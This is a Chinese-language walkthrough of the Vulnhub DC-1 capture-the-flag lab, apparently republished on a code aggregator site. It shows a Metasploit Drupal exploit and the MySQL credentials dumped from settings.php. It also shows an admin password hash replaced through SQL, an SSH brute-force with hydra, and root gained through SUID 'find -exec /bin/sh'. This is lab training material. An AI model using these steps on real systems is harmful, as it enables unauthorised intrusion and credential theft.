当前位置: 代码迷 >> 综合 >> Vulnhub DC-1
  详细解决方案

Vulnhub DC-1

热度:65   发布时间:2023-12-05 18:51:57.0

首先要知道:中华人民共和国网络安全法

接下来,我们开始 Vulnhub DC 系列靶场

DESCRIPTION(DC-1 描述:)
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.TECHNICAL INFORMATION
DC-1 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.While I haven't tested it within a VMware environment, it should also work.It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.CONTACT
This is the first vulnerable lab challenge that I've created, so feel free to let me know what you think of it.I can be contacted via Twitter - @DCAU7

目的:五个 flag

扫C段网,找到多出来的CD-1靶机(因为靶机是多个时间段完成的,所以此处IP与后面的IP略有不同)

扫靶机开的服务,发现 80 端口,默认页面

看到 Apache 和 Drupal 的版本号 

页面查看,登录框

账号密码爆破

SQL注入

查看CMS是否有漏洞

Drupal 版本 7

发现左下的 drupal 信息,信息收集:Drupal是一个开源的内容管理系统(CMS) 平台

开 msf,search drupal 相关漏洞

set RHOSTS [设置待扫描的IP地址]

 

设置攻击 ip 

查看设置接口等信息 

 可以的 IP (RHOST)已经配置好

直接执行 run / exploit

直接进入 shell

现在查看我现在操作的用户是谁

 

查看当前工作目录路径

 列出目前工作目录所含之文件及子目录,看到 flag1 

  

 每一个好的CMS都需要一个配置文件  -  你也一样。

上网收集信息 

查看 sites 敏感文件,发现权限不够,做提权处理

输入 python 没有报 not found,python 环境存在 

使用 python pty 方式接收反弹来的 shell 实现交互式 shell

python -c 'import pty;pty.spawn("/bin/bash")'

获取管理员权限

查看文件

 可以看到这里是 flag2 

<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);......

可以看到 mysql 数据库的账号密码,登录数据库

mysql -u用户名 -p密码

mysql -udbuser -pR0ck3t

-u 和 -p 后面跟着的中文,不能有空格

注意数据库语句末尾有分号

+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

 

回去 msf, searchsploit drupal 搜索漏洞

这里可以直接使用漏洞脚本进行对密码操作,我们用另一种方法替换密码

使用 drupal 的加密文件加密 123 得到哈希值

update users set pass="$S$DH7Q/w9i1uB40JATOYyS41bhSY5jiuIB8eZ.NkWFxox9AK97jqIJ" where uid=1;

重置替换密码

登录进入

查看 Dashboard 看到 flag3

点进去看到相关信息

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

 结合理解知道,要获取 shadow 的密码

 1./etc/passwd 文件内容格式

        该目录存储的是操作系统用户信息,该文件为所有用户可见

用户名: 密码 : uid  : gid :用户描述:主目录:登陆shell


2./etc/shadow 文件内容格式

        /etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由 pwconv 命令根据/etc/passwd中的数据自动产生。

username: passwd: lastchg: min: max: warn: inactive: expire: flag 

登录名:加密口令:最后一次修改时间:最小时间间隔:最大时间间隔:警告时间:不活动时间:失效时间:标志

查看 etc 目录,两个敏感文件 

 查看 passwd 文件,发现 flag4

我们知道了用户名,缺密码,查看 shadow 文件,无法访问,果然打不开

 

爆破工具:msf,hydra,john,medusa,wfuzz,bp,dirb

hydra -h 查看用法

使用语法:

/usr/share/wordlists/ 储存自带的密码字典文件

我们使用常用的 kali 自带的密码字典 /usr/share/john/password.lst

options:

-l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE

-p PASS  or -P FILE  try password PASS, or load several passwords from FILE

-v / -V / -d  verbose mode / show login+pass for each attempt / debug mode

-f / -F         exit when a login/pass pair is found (-M: -f per host, -F global)

hydra -l flag4 -P /usr/share/john/password.lst 192.168.37.130 ssh -V -f

爆破得到密码 

登录网页,失败 

回到靶机登录成功

 

发现 txt 文件,访问可知我们需要用相同方式在 root 下得到另一个 flag

root 应该是文件,查看一下,拒绝访问

需要提权操作

常用提权方法:

sudo -l

查内核漏洞

添加用户

find

history

ls -a

想到之前的提示没用完,

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

很明显提示 find 和 exec 是 SUID 提权,SUID 标识会继承 root 权限,我们使用标识期间就会获取 root 权限

查看当前系统具有的SUID标识的命令:

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

find / -perm -u=s -type f 2>/dev/null

可以看到 find 命令 

 

提权

 find -exec "/bin/sh" \;

获取 root 权限 

 ok,全部结束